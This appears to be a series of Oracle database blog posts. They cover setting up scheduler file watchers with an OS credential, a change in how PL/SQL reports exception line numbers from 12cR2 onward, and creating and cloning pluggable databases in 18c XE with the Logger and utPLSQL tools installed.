If we’re going to do anything with the files (e.g. load data) then the OS user that started Oracle (usually oracle) will also need to be able to read these files.

The easiest way to achieve this is simply to create a credential for the oracle OS user.
There was an exploit back in 11gR2, which meant that it was possible to discover the password of the OS user used in a credential.
This particular vulnerability seems to have been fixed in later versions. It doesn’t work on the 12c R2 database I’m using here for example.
Whilst I’m not aware of any such vulnerabilities extant for more recent versions, it would seem prudent to use a somewhat less privileged OS user for our credential…

Sorry about the bag, didn’t have time to shave!

You’re not obliged to laugh at that rather oblique Blackadder reference in this heading, which I thought might be suitable as a caption for that photo. Anyhow, it does explain the name of the OS user I’ve created to use for our credential…

sudo useradd -m ponsonby
sudo passwd ponsonby

…creating a password for ponsonby when prompted.

Whilst I’m here, I may as well create the directory to hold the files under ponsonby’s home directory, which will ensure the user has access to these files.
To allow oracle to also see the files, I’ll set the directory group to be oinstall, the oracle user’s primary group.
Note that I don’t need to make ponsonby a member of this group.
Finally, I need to set the others executable bit on ponsonby’s home directory so that oracle can access the in_files sub-directory :

sudo mkdir /home/ponsonby/in_files
sudo chown ponsonby /home/ponsonby/in_files 
sudo chgrp oinstall /home/ponsonby/in_files
sudo chmod a+x /home/ponsonby

Now we have a landing directory for our files, we can create a directory object for it in the database. Whilst this is not required for the filewatcher itself, I’m going to want to read the contents of the file from within the database at some point so…

create directory in_files as '/home/ponsonby/in_files'
/

Finally, we can create our credential…

begin
    dbms_credential.create_credential(
        credential_name => 'caption_cred',
        username => 'ponsonby',
        password => 'a-fiendishly-difficult-to-guess-password',
        comments => 'Credentials for file watcher on IN_FILES directory');
 end;
 /

…replacing “a-fiendishly-difficult-to-guess-password” with the password we set for ponsonby.

We can now see our credential in USER_SCHEDULER_CREDENTIALS :

select credential_name, username, comments
from user_scheduler_credentials
where credential_name = 'CAPTION_CRED'
/



CREDENTIAL_NAME USERNAME   COMMENTS                                          
--------------- ---------- --------------------------------------------------
CAPTION_CRED    ponsonby   Credentials for file watcher on IN_FILES directory

Right, now that’s all sorted we can…

Create a File Watcher

To start with we’re going to look for files called captionsomething.txt :

begin
    dbms_scheduler.create_file_watcher(
        file_watcher_name => 'caption_comp_fw',
        directory_path => '/home/ponsonby/in_files',
        file_name => 'caption*.txt',
        credential_name => 'caption_cred',
        enabled => false,
        comments => 'Watching for "witty" captions');
end;
/

Note that we’ve created the filewatcher in a disabled state at the moment, as we can see here :

select enabled, directory_path, file_name, 
    credential_name, comments
from user_scheduler_file_watchers
where file_watcher_name = 'CAPTION_COMP_FW'
/



ENABLED    DIRECTORY_PATH            FILE_NAME       CREDENTIAL_NAME COMMENTS                                          
---------- ------------------------- --------------- --------------- --------------------------------------------------
FALSE      /home/ponsonby/in_files   caption*.txt    CAPTION_CRED    Watching for "witty" captions                     

This is because we’ve still got to create all the other stuff we need for it to do anything useful.
Speaking of which…

Yes, that is my Death Star parked outside

When the file watcher runs it will return an object of type SCHEDULER_FILEWATCHER_RESULT.
We’re going to take the scalar properties of that object and dump them into a table :

create table incoming_files(
    destination VARCHAR2(4000),
    directory_path VARCHAR2(4000),
    actual_file_name VARCHAR2(4000),
    file_size NUMBER,
    file_timestamp TIMESTAMP WITH TIME ZONE)
/    

…using this stored procedure :

create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
begin
    insert into incoming_files( 
        destination, 
        directory_path, 
        actual_file_name, 
        file_size, 
        file_timestamp)
    values(
        i_result.destination,
        i_result.directory_path,
        i_result.actual_file_name,
        i_result.file_size,
        i_result.file_timestamp);
end;
/

NOTE – when this gets executed from the scheduler job, the transaction will commit.
You do not need to do this explicitly. Additionally if you attempt to use an autonomous transaction, your change is likely to disappear into the ether.

We need a means of calling this stored procedure when the filewatcher is triggered. This requires two further objects…

The Dentist will see you now

First, we need a scheduler program, which we’ll use to call the procedure. As we want to read the output of the filewatcher, we’ll need to add an argument to the program.
Then, we’ll create a scheduler job to tie the program to the file watcher.
I know, let’s do all of that in one fell swoop :

begin
    dbms_scheduler.create_program(
        program_name => 'caption_prog',
        program_type => 'stored_procedure',
        program_action => 'save_incoming_file',
        number_of_arguments => 1,
        enabled => false);
        
    -- need to make sure this program can see the message sent by the filewatcher...
    dbms_scheduler.define_metadata_argument(
        program_name => 'caption_prog',
        metadata_attribute => 'event_message',
        argument_position => 1);
        
    -- Create a job that links our filewatcher to our program...
    dbms_scheduler.create_job(
        job_name => 'caption_job',
        program_name => 'caption_prog',
        event_condition => null,
        queue_spec => 'caption_comp_fw',
        auto_drop => false,
        enabled => false);
end;
/

We can now see the program is in the data dictionary…

select program_type, program_action, number_of_arguments,
    enabled
from user_scheduler_programs
where program_name = 'CAPTION_PROG'
/


PROGRAM_TYPE         PROGRAM_ACTION       NUMBER_OF_ARGUMENTS ENABLED   
-------------------- -------------------- ------------------- ----------
STORED_PROCEDURE     save_incoming_file                     1 FALSE     

…along with the job…

select program_name, schedule_type, file_watcher_name,
    enabled
from user_scheduler_jobs
where job_name = 'CAPTION_JOB'
/

PROGRAM_NAME         SCHEDULE_TYPE        FILE_WATCHER_NA ENABLED   
-------------------- -------------------- --------------- ----------
CAPTION_PROG         FILE_WATCHER         CAPTION_COMP_FW FALSE     

Now we’ve created all of the components, we can enable everything :

begin
    dbms_scheduler.enable('caption_comp_fw');
    dbms_scheduler.enable('caption_prog');
    dbms_scheduler.enable('caption_job');
end;
/

To confirm everything in our stack is enabled :

select file_watcher_name as scheduler_object, enabled
from user_scheduler_file_watchers
where file_watcher_name = 'CAPTION_COMP_FW'
union all
select program_name, enabled
from user_scheduler_programs
where program_name = 'CAPTION_PROG'
union all
select job_name, enabled
from user_scheduler_jobs
where program_name = 'CAPTION_PROG'
and file_watcher_name = 'CAPTION_COMP_FW'
/


SCHEDULER_OBJECT               ENABLED             
------------------------------ --------------------
CAPTION_COMP_FW                TRUE                
CAPTION_PROG                   TRUE                
CAPTION_JOB                    TRUE                

Test

To test it, we need to create a file with an appropriate name in the directory we’re watching :

cd /home/ponsonby/in_files
sudo su ponsonby
echo "Inside every old person is a young person wondering what happened.">caption01.txt

You’ll need to allow a minute or so between the file being created and the job running.
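
If you’re feeling impatient, you can check when the next filewatcher poll is due :

select state, next_run_date
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/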

As this is a scheduler job, you can check how the run went in the usual places :

select log_id, job_name, log_date, status
from user_scheduler_job_log
where job_name = 'CAPTION_JOB'
/


    LOG_ID JOB_NAME                       LOG_DATE                            STATUS         
---------- ------------------------------ ----------------------------------- ---------------
     27010 CAPTION_JOB                    28-SEP-20 20.51.01.508628000 +01:00 SUCCEEDED      

For further details :

select job_name, run_duration, status,
    error#, additional_info, errors
from user_scheduler_job_run_details
where log_id = 27010
/

JOB_NAME                       RUN_DURATION        STATUS              ERROR# ADDITIONAL_INFO      ERRORS              
------------------------------ ------------------- --------------- ---------- -------------------- --------------------
CAPTION_JOB                    +00 00:00:00.000000 SUCCEEDED                0                                          

Of course, the important bit here is what, if anything, has been inserted into the table :

select destination, directory_path, actual_file_name,
    file_size, file_timestamp
from incoming_files
/

DESTINATION     DIRECTORY_PATH            ACTUAL_FILE_NAM  FILE_SIZE FILE_TIMESTAMP                  
--------------- ------------------------- --------------- ---------- --------------------------------
localhost       /home/ponsonby/in_files   caption01.txt           67 28-SEP-20 19.49.23.000000000 GMT


Wait for it !

All of this is fine if you want to process a small file, or even use it solely as a trigger to kick something off, but what about a larger file or, at least, one that takes more than a few seconds to transfer into the directory we’re watching ?

Fortunately, we can use the filewatcher’s steady_state_duration parameter to specify a minimum time the filewatcher should wait after the file is last written to before it considers the file to have arrived :

begin
    dbms_scheduler.set_attribute(
        name => 'caption_comp_fw',
        attribute => 'steady_state_duration',
        value => interval '20' second);
end;
/

To confirm the change :

select steady_state_duration
from user_scheduler_file_watchers
where file_watcher_name = 'CAPTION_COMP_FW'
/


STEADY_STATE_DURATION         
------------------------------
+00 00:00:20.000000

This means that the filewatcher should now wait until a file has not changed for 20 seconds before it kicks anything off.
Note that the steady_state_duration must be set to a value less than the interval at which the file watchers are set to poll ( 1 minute in our case).

Just as well, as we’ve added a table to our application…

create table captions( 
    file_name varchar2(4000),
    caption_text varchar2(4000))
/

…and made some changes to the procedure we’re calling…

create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
    fh utl_file.file_type;
    buffer varchar2(4000);
    
    fname varchar2(4000);
    C_DIR constant all_directories.directory_name%type := 'IN_FILES';
begin
    insert into incoming_files( 
        destination, 
        directory_path, 
        actual_file_name, 
        file_size, 
        file_timestamp)
    values(
        i_result.destination,
        i_result.directory_path,
        i_result.actual_file_name,
        i_result.file_size,
        i_result.file_timestamp);

    fname := i_result.actual_file_name;
    fh := utl_file.fopen(C_DIR, fname, 'R');
    
    loop
        begin -- nested block to read the file
            utl_file.get_line(fh, buffer);    
            if buffer is null then
                exit;
            end if;
            insert into captions( file_name, caption_text)
            values( fname, buffer); 
        exception when no_data_found then
            -- no more data to read
            exit;
        end; -- file read block
    end loop;
    utl_file.fclose(fh);
end;
/

Now we just need something to create our file…slowly. In my case I’m using this bash script ( running as ponsonby from /home/ponsonby) :

#!/bin/sh
outfile='in_files/caption02.txt'
echo 'Dress-down day at the Sith Order' >$outfile
sleep 19
echo 'Tall...and handsome (in the dark)'>>$outfile
exit

Once this has completed, we can check our application and confirm that the filewatcher has found the file…

select actual_file_name, file_size, file_timestamp 
from incoming_files
where actual_file_name = 'caption02.txt'
/

ACTUAL_FILE_NAME      FILE_SIZE FILE_TIMESTAMP                  
-------------------- ---------- --------------------------------
caption02.txt                67 29-SEP-20 20.47.21.000000000 GMT

…and waited long enough for it to finish being written before processing it…

select caption_text 
from captions
where file_name = 'caption02.txt'
/


CAPTION_TEXT                                                
------------------------------------------------------------
Dress down day at the Sith Order
Tall...and handsome( in the dark)

Acknowledgements

As ever Oracle Base was a veritable font of wisdom on the issue of file watchers.

I also found lots of useful info in Aychin’s Oracle RDBMS Blog.
Finally, this Stack Exchange article was invaluable in solving the mystery of *nix directory permissions.

Time flies when you’re having fun – The truth about Oracle Exception handlers (this week)

Fri, 2020-07-10 14:22

Oracle Twitter is a bit like Poker – you tend to take notice when Aces turn up.
I mention this because I’m indebted to Jacek Gebal, Sabine Heismath and Andy Sayer, whose discussion on this topic alerted me to the fact that PL/SQL exception handling had changed in a small but important way whilst I wasn’t looking.

Just in case you’re wondering whether that opening paragraph is a prelude to a post containing gratuitous references to a certain Motorhead song, all I can say is…if you like to gamble…

How things were

Consider this procedure :

create or replace procedure deal_em( i_card in varchar2)
as
begin
    if i_card in ('7', '11') then
        raise_application_error(-20000, 'Snake eyes watching you');
    elsif upper(i_card) = 'JOKER' then
        raise_application_error(-20001, q'[Don't forget the Joker]');
    elsif upper(i_card) = 'ACE OF SPADES' then
        dbms_output.put_line('The only card I need !');
    else
        raise_application_error(-20002, q'[I'm a shade of green]');
        dbms_output.put_line('Card is '||i_card);
    end if;    
exception when others then
    -- I'll see your application error and raise you...
    raise;
end;
/

As I observed some years ago, back in the days of 11g and before, PL/SQL programmers could entertain themselves for hours by playing hunt the exception…

SQL> exec deal_em('7')
BEGIN deal_em('7'); END;

*
ERROR at line 1:
ORA-20000: Snake eyes watching you
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at line 1


SQL> exec deal_em('Joker')
BEGIN deal_em('Joker'); END;

*
ERROR at line 1:
ORA-20001: Don't forget the Joker
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at line 1


SQL> exec deal_em('2')
BEGIN deal_em('2'); END;

*
ERROR at line 1:
ORA-20002: I'm a shade of green
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at line 1

Read ’em and weep, three different exceptions but all of them are reported at line 16.

From 12cR2 onward, however (thanks Phil Goldenberg), some clever people at Oracle seem to have been pushing up the ante…

SQL> exec deal_em('7') 
BEGIN deal_em('7'); END;

*
ERROR at line 1:
ORA-20000: Snake eyes watching you
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at "MIKE.DEAL_EM", line 5
ORA-06512: at line 1


SQL> exec deal_em('Joker')
BEGIN deal_em('Joker'); END;

*
ERROR at line 1:
ORA-20001: Don't forget the Joker
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at "MIKE.DEAL_EM", line 7
ORA-06512: at line 1


SQL> exec deal_em('2')
BEGIN deal_em('2'); END;

*
ERROR at line 1:
ORA-20002: I'm a shade of green
ORA-06512: at "MIKE.DEAL_EM", line 16
ORA-06512: at "MIKE.DEAL_EM", line 11
ORA-06512: at line 1

Yep, right there at the bottom of the error stack is the line number from which the error originated.
There you have it, PL/SQL exceptions are now rather easier to pinpoint.
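If you’d rather capture this information programmatically than read it off the client error stack, DBMS_UTILITY can report both the error stack and the backtrace from inside a handler. A minimal sketch, re-using the DEAL_EM procedure above :

set serverout on
begin
    deal_em('2');
exception when others then
    -- format_error_stack tells us what went wrong, format_error_backtrace tells us where it was raised
    dbms_output.put_line(dbms_utility.format_error_stack);
    dbms_output.put_line(dbms_utility.format_error_backtrace);
end;
/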
Oh, and gambling’s for fools.

Making the most of Oracle 18c XE – Pluggable Databases and the Oracle Eco-System

Fri, 2020-06-26 12:41

This was going to be a simple post about creating multiple Pluggable Databases (PDBs) in Oracle 18cXE.
But you know what it’s like, you get your lego database set out and then you spot those unusual shaped bricks… and the transparent ones… oh, that one has a wheel on…and get a bit carried away.
What follows is a guide on how to create three concurrent PDBs on an Oracle 18cXE database. However, I have taken the opportunity to investigate other areas of the Express Edition platform and so will be making use of Advanced Compression as well as Oracle Enterprise Manager Express.
In fact, I wouldn’t be surprised if SQLDeveloper put in an appearance as well.
I’ve also included a couple of the more notable members of Oracle’s small-but-perfectly-formed eco-system into the final design. On top of all that, I’ll be performing a magic trick to ensure that I only have to install each piece of software once, even though it may end up in multiple PDBs…

The Environment

The server we’ll be working on is running CentOS7.
It also has an Oracle 18cXE instance which has been newly installed following these steps.

Remote connection to the Container Database’s (CDB) Oracle Enterprise Manager Express instance is possible because we’ve run :

exec dbms_xdb_config.SetListenerLocalAccess(false);
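If you’re not sure which port EM Express is listening on, you can ask the database. A quick sketch, assuming the default HTTPS configuration :

select dbms_xdb_config.gethttpsport as em_express_port
from dual;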

Remote connection via TNS is possible provided the client from which we’re connecting has the following tnsnames.ora entry for it :

  XE =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = myserver.mydomain)(PORT = 1521))
      (CONNECT_DATA =
        (SERVER = DEDICATED)
        (SERVICE_NAME = XE)
      )
    )

…where myserver.mydomain is the address of the server.

When connected to the CDB as SYSTEM, we can see that we currently have two PDBS :

select sys_context('userenv', 'con_name') from dual;

SYS_CONTEXT('USERENV','CON_NAME')
--------------------------------------------------------------------------------
CDB$ROOT

select con_id, pdb_name, status
from dba_pdbs;

    CON_ID PDB_NAME			  STATUS
---------- ------------------------------ ----------
	 3 XEPDB1			  NORMAL
	 2 PDB$SEED			  NORMAL

Now, we know that the maximum number of PDBs allowed in 18cXE is three, a limit which does not appear to include the PDB$SEED database.
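If you want to see what the instance itself thinks the limit is, the MAX_PDBS initialization parameter (introduced in 12.2) is worth a look. A quick sketch; the value returned will depend on your version and edition :

select value
from v$parameter
where name = 'max_pdbs';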

The Target Environment

I want to end up with three PDBS – one for Development, one for test and one for production.
As I’m doing a bit of “magic” I have borrowed the unofficial motto of the Unseen University to use as the naming convention for my PDBs.
Wizards are renowned for their big dinners and their motto is “Eta Beta Pi” ( Eat a Better Pie).
Wizards are not renowned for their punning.
Anyhow once I’ve finished, I’d like my PDBs to be configured as follows :

  • ETA (Development) – including the OraOpenSource Logger and utPLSQL test framework
  • BETA (Test) – OraOpenSource Logger and utPLSQL installed
  • PI (Production) – OraOpenSource Logger only

All PDBs should have a USERS tablespace in which compression is enabled by default.
Before we go and create any databases though, we need to get rid of the existing XEPDB1 PDB…

Dropping a PDB

Now, we could re-purpose and rename XEPDB1, but as it’s currently empty it’s probably easier just to drop it.

At the moment, we can see that this PDB has the following datafiles :

select df.name
from v$datafile df
inner join dba_pdbs pdb
    on pdb.con_id = df.con_id
    and pdb.pdb_name = 'XEPDB1';

NAME
--------------------------------------------------------------------------------
/opt/oracle/oradata/XE/XEPDB1/system01.dbf
/opt/oracle/oradata/XE/XEPDB1/sysaux01.dbf
/opt/oracle/oradata/XE/XEPDB1/undotbs01.dbf
/opt/oracle/oradata/XE/XEPDB1/users01.dbf

We want to get rid of these when we drop the PDB.

The PDB is currently open…

select name, open_mode
from v$pdbs
where name = 'XEPDB1'

NAME			       OPEN_MODE
------------------------------ ----------
XEPDB1			       READ WRITE

…so we need to connect as a user with the ALTER DATABASE and CREATE PLUGGABLE DATABASE privileges.

We can then close the PDB…

alter pluggable database xepdb1 close;

…and verify that its state has changed…

select open_mode
from v$pdbs
where name = 'XEPDB1';

OPEN_MODE
----------
MOUNTED

…before finally dropping it…

drop pluggable database xepdb1 including datafiles;

The PDB has now been removed…

select con_id, pdb_name, status
from dba_pdbs;

    CON_ID PDB_NAME			  STATUS
---------- ------------------------------ ----------
	 2 PDB$SEED			  NORMAL

…along with all of the datafiles…

ls -l /opt/oracle/oradata/XE/XEPDB1/
total 0

Now we’ve made a bit of space PDB wise, it’s time to…

Create a PDB from a Seed Database

I’m going to start by creating what will become my Production database (PI).
Speaking of Wizards, we’re going utilise the one in Enterprise Manager Express to do this.

To begin with, we need to connect to EM Express :

Hot Tip – don’t do what I did and connect as SYSTEM if you want to open the PDB once it’s been created ! Use an account with the ALTER DATABASE privilege.

Navigate to the Containers page

In the Containers section of the page choose Create from the Actions menu.

The wizard should now appear

On the General Page (first page) of the Create PDB From Seed wizard, supply values for the following :
PDB Name : pi
Username : pdbadmin
Password : a password for pdbadmin
Confirm password :

Incidentally, you can see the code that will be executed by EM Express if you click the Show SQL button.
In my case this is :

create pluggable database "PI" admin user "PDBADMIN" identified by **********  file_name_convert = ('/opt/oracle/oradata/XE/pdbseed/', '/opt/oracle/product/18c/dbhomeXE/XE/datafile/pi/');

alter pluggable database "PI" open read write;

-- declare bind variables
var b1 varchar2(4000);
var b2 varchar2(4000);
var b3 number;
var b4 number;
var b5 number;
var b6 number;
var b7 number;

-- init bind values 
exec :b1 := 'DEFAULT_CDB_PLAN';
exec :b2 := 'pi';
exec :b3 := 1;
exec :b4 := 100;
exec :b5 := 100;
exec :b6 := ;
exec :b7 := ;

begin
     sys.dbms_resource_manager.clear_pending_area();
     sys.dbms_resource_manager.create_pending_area();
     sys.dbms_resource_manager.create_cdb_plan_directive(
       plan                  => :b1,
       pluggable_database    => :b2,
       shares                => :b3,
       utilization_limit     => :b4,
       parallel_server_limit => :b5,
       memory_min            => :b6,
       memory_limit          => :b7);
       sys.dbms_resource_manager.validate_pending_area();
       sys.dbms_resource_manager.submit_pending_area();
   end;
/;

Some of that may change as we press on through the wizard. Click the Next arrow :


Click the right arrow to go to the Storage page :

In our case, we accept the default datafile locations and unlimited storage, so no changes are needed here.
Click the next arrow again, and we’ll have the chance to edit the default Resource Limits :

Once again, no changes are required in my case.

Finally, I’m going to click OK…and realise my mistake connecting as SYSTEM

On the plus side, it’s not too serious. The PDB has been created…

select con_id, pdb_name, status
from dba_pdbs
order by con_id;

    CON_ID PDB_NAME			  STATUS
---------- ------------------------------ ----------
	 2 PDB$SEED			  NORMAL
	 3 PI				  NEW

…it’s just not currently open…

select open_mode
from v$pdbs
where name = 'PI'
/

OPEN_MODE
----------
MOUNTED

To remedy this, I simply need to connect as a user with ALTER DATABASE and open the offending PDB.
As I have a brand new Database and I’m the DBA I’m going to connect as SYS as SYSDBA and run :

alter pluggable database pi open read write;

…which should yield the message…

Pluggable database altered.

…signalling that PI is open…

select open_mode
from v$pdbs
where name = 'PI';

OPEN_MODE
----------
READ WRITE

PI has the following datafiles :

select df.name
from v$datafile df
inner join dba_pdbs pdb
    on pdb.con_id = df.con_id
    and pdb.pdb_name = 'PI'
/

NAME
--------------------------------------------------------------------------------
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/system01.dbf
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/sysaux01.dbf
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/undotbs01.dbf

One for each of the three non-temporary tablespaces created…

alter session set container = pi;

select tablespace_name, status, contents
from dba_tablespaces;

TABLESPACE_NAME 	       STATUS	 CONTENTS
------------------------------ --------- ---------------------
SYSTEM			       ONLINE	 PERMANENT
SYSAUX			       ONLINE	 PERMANENT
UNDOTBS1		       ONLINE	 UNDO
TEMP			       ONLINE	 TEMPORARY
Creating the USERS tablespace

We want to add a tablespace called USERS to hold any application data. So, as a user with ALTER DATABASE, make sure we’re connected to the correct container…

alter session set container = pi;

select sys_context('userenv', 'con_name') from dual;

…and run…

create tablespace users 
    datafile '/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/users01.dbf' size 512M autoextend on
/
    
alter tablespace users default table compress for oltp;

This should result in a tablespace with a default table compression value set to ENABLED :

select tablespace_name, def_tab_compression
from dba_tablespaces;

TABLESPACE_NAME                DEF_TAB_
------------------------------ --------
SYSTEM                         DISABLED
SYSAUX                         DISABLED
UNDOTBS1                       DISABLED
TEMP                           DISABLED
USERS                          ENABLED 

…and a new datafile…

select df.name
from v$datafile df
inner join dba_pdbs pdb
    on pdb.con_id = df.con_id
    and pdb.pdb_name = 'PI'
/ 

NAME                                                                            
--------------------------------------------------------------------------------
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/system01.dbf                    
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/sysaux01.dbf                    
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/undotbs01.dbf                   
/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI/users01.dbf    
Setting the default tablespace

At present, the default tablespace in PI is SYSTEM :

select property_value
from database_properties
where property_name = 'DEFAULT_PERMANENT_TABLESPACE'
/

PROPERTY_VALUE                                                                  
--------------------------------------------------------------------------------
SYSTEM                                                                          

We want to change this to USERS, so …

alter pluggable database default tablespace users;

Pluggable database altered.

select property_value
from database_properties
where property_name = 'DEFAULT_PERMANENT_TABLESPACE'
/

PROPERTY_VALUE                                                                  
--------------------------------------------------------------------------------
USERS                                                                           
Ensuring the database starts on reboot

As a final piece of database administration, we want to make sure that PI starts when the instance does. To do this, we need to make sure that the PDB is open…

select open_mode
from v$pdbs
where name = 'PI';  
  
OPEN_MODE
----------
READ WRITE

…and then save the PDB’s state :

alter pluggable database pi save state;
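If you want to confirm that the state has been recorded, there’s a dictionary view for that. A quick sketch, run from the CDB root, where I’d expect the STATE column to show OPEN for PI :

select con_name, state
from dba_pdb_saved_states;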
Installing OraOpenSource Logger

I’ve set up a tns entry in the tnsnames.ora on my client machine. You’ll notice that it’s almost identical to the one for the CDB, with only the name of the entry itself and the service_name changed to the name of the new PDB :

  PI =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = myserver.mydomain)(PORT = 1521))
      (CONNECT_DATA =
        (SERVER = DEDICATED)
        (SERVICE_NAME = PI)
      )
    )

…where myserver.mydomain is the address of the server.

I’ve downloaded the zip for OraOpenSource Logger v 3.11 from Github and extracted it onto my client machine.
I now navigate to the main directory and connect to the database as system:

cd logger311
sqlplus system@pi

NOTE – if you have not yet set up remote connections and you want to perform this installation from the server, then download and extract the zip file to the server itself. Then, navigate to the logger311 directory and connect to the database using :

sqlplus system@localhost:1521/pi 

Either way, once you’re connected, you can run the creation script for the Logger owner schema.
You will be prompted for a schema name, default tablespace and password. Remember the username and password you select because you’ll need them in a moment…

@create_user.sql

Name of the new logger schema to create       [LOGGER_USER] : 
Tablespace for the new logger schema           [USERS] : 
Temporary Tablespace for the new logger schema  [TEMP] : 
Enter a password for the logger schema              [] :       

User created.


User altered.


Grant succeeded.



LOGGER_USER user successfully created.
Important!!! Connect as the LOGGER_USER user and run the logger_install.sql script.

Disconnected from Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production
Version 18.4.0.0.0

Now, we need to connect as the user we’ve just created ( LOGGER_USER in this case) and run :

@logger_install.sql

This will result in a number of actions concluding with :

*************************************************
Now executing LOGGER.STATUS...

Project Home Page        : https://github.com/oraopensource/logger/
Logger Version           : 3.1.1
Debug Level              : DEBUG
Capture Call Stack       : TRUE
Protect Admin Procedures : TRUE
APEX Tracing             : Disabled
SCN Capture              : Disabled
Min. Purge Level         : DEBUG
Purge Older Than         : 7 days
Pref by client_id expire : 12 hours
For all client info see  : logger_prefs_by_client_id


PL/SQL procedure successfully completed.

*************************************************

PL/SQL procedure successfully completed.


View altered.

NOTE – once we get some application owning schemas we’ll need to grant Logger objects to them.
This can be done by running the following as the logger owner :

@scripts/grant_logger_to_user.sql <username> 

…where username is the schema to whom you wish to grant logger.

Once this has run, you can then run the following as the granted user :

@scripts/create_logger_synonyms.sql <logger owner>

…where logger owner is the name of the Logger application owner schema.

Just as an aside, we can see that the logger tables have inherited the default compression settings for the USERS tablespace in which they have been created :

select table_name, compression, compress_for
from dba_tables
where owner = 'LOGGER_USER'
order by 1;

TABLE_NAME                     COMPRESS COMPRESS_FOR                  
------------------------------ -------- ------------------------------
LOGGER_LOGS                    ENABLED  ADVANCED                      
LOGGER_LOGS_APEX_ITEMS         ENABLED  ADVANCED                      
LOGGER_PREFS                   ENABLED  ADVANCED                      
LOGGER_PREFS_BY_CLIENT_ID      ENABLED  ADVANCED         

Finally, we have our Production PDB configured. That was a fair bit of work though, and we still have another two PDBs to create.
Fortunately, we can save ourselves some time and effort by…

Cloning a PDB

Next, I want to create my Test PDB ( BETA). As with PI, it needs to have OOS Logger installed and have a USERS tablespace with the same characteristics.
We can achieve this with rather less typing than you might expect, simply by cloning the PI PDB.

To do this, we need to be connected as a user with ALTER DATABASE and CREATE PLUGGABLE DATABASE privileges ( I’m using SYS as SYSDBA here).

To start with, we need to ensure that PI is in Read-Only mode in order to clone it. So, we check its current mode…

select open_mode
from v$pdbs
where name = 'PI';

OPEN_MODE 
----------
READ WRITE

OK, so we need to put the PDB into read only mode…

alter pluggable database pi close;
alter pluggable database pi open read only;

select open_mode
from v$pdbs
where name = 'PI';

OPEN_MODE 
----------
READ ONLY 

…and then clone it…

create pluggable database beta from pi
    file_name_convert = (
        '/opt/oracle/product/18c/dbhomeXE/XE/datafile/PI', 
        '/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA')
/

Pluggable database created.

We can confirm that the PDB has been created ( it will have a status of “NEW” until it is opened for the first time) :

select pdb_name, status
from dba_pdbs;

PDB_NAME                       STATUS    
------------------------------ ----------
BETA                           NEW       
PDB$SEED                       NORMAL    
PI                             NORMAL    

We can also verify that the datafiles have been created in line with the FILE_NAME_CONVERT clause of the CREATE PLUGGABLE DATABASE command we issued :

select df.name
from v$datafile df
inner join dba_pdbs pdb
	 on pdb.con_id = df.con_id
	 and pdb.pdb_name = 'BETA'
/

NAME                                                                            
--------------------------------------------------------------------------------
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/system01.dbf                  
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/sysaux01.dbf                  
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/undotbs01.dbf                 
/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA/users01.dbf  

At the moment, neither of our PDBs is open for read/write access :

select name, open_mode
from v$pdbs
/

NAME                           OPEN_MODE 
------------------------------ ----------
PDB$SEED                       READ ONLY 
PI                             READ ONLY 
BETA                           MOUNTED   

To open them :

alter pluggable database all except pdb$seed open read write force;
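We can then re-run the earlier query to confirm that PI and BETA are now open read/write :

select name, open_mode
from v$pdbs
/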

If we switch to BETA, we can see that OOS Logger has been copied from PI and is already installed :

alter session set container = beta;

select object_type, count(object_name)
from dba_objects
where owner = 'LOGGER_USER'
group by object_type
order by 2 desc;

OBJECT_TYPE             COUNT(OBJECT_NAME)
----------------------- ------------------
INDEX                                    8
TABLE                                    4
VIEW                                     3
SEQUENCE                                 2
TRIGGER                                  2
JOB                                      2
LOB                                      2
PROCEDURE                                1
PACKAGE BODY                             1
PACKAGE                                  1

10 rows selected. 

We need to make sure that Beta starts on database startup :

alter pluggable database beta save state;
Installing utPLSQL

Remember that BETA is to be our Test environment and we want to install the utPLSQL PL/SQL testing framework.
First, we need to download the latest version from here ( 3.1.10 at the time of writing).
Once we’ve extracted the zip, we need to follow the installation instructions so…

conn sys@beta as sysdba
@install_headless_with_trigger.sql 

This creates a schema called UT3 which contains the framework objects :

select object_type, count(object_name)
from dba_objects
where owner = 'UT3'
group by object_type
order by 2 desc; 

OBJECT_TYPE             COUNT(OBJECT_NAME)
----------------------- ------------------
TYPE                                   112
TYPE BODY                               78
INDEX                                   53
TABLE                                   30
PACKAGE                                 25
PACKAGE BODY                            25
SYNONYM                                 15
LOB                                     11
SEQUENCE                                 4
TRIGGER                                  1

10 rows selected. 

As before, we can confirm that this software exists only in this PDB :

alter session set container=cdb$root;

select username
from dba_users
where oracle_maintained = 'N';

no rows returned
Cloning a database using SQLDeveloper

If you prefer a more pointy/clicky variation on the theme of PDB cloning then SQLDeveloper is on hand to help (I’m using version 19.2 here).

Once you’ve started SQLDeveloper, from the View menu select DBA

If you don’t already have a connection to your CDB in the DBA Navigator window, add one using the green plus icon.

Now, expand the Connections tree and then the Container Database node and select the BETA node

From the Actions dropdown, select Clone PDB :

This will open the Clone Pluggable Database window :

  1. Enter the name of the PDB we want to create (ETA in our case)
  2. File Name Conversions : Select Custom Names from the drop-down.
    You should see that the Target files are going to be written to a directory named after the new PDB
  3. KeyStorePassword : leave blank
  4. Check Open Automatically

The window should now look like this :

If you click on the SQL tab, we should see the code that SQLDeveloper is planning to run based on our selections :
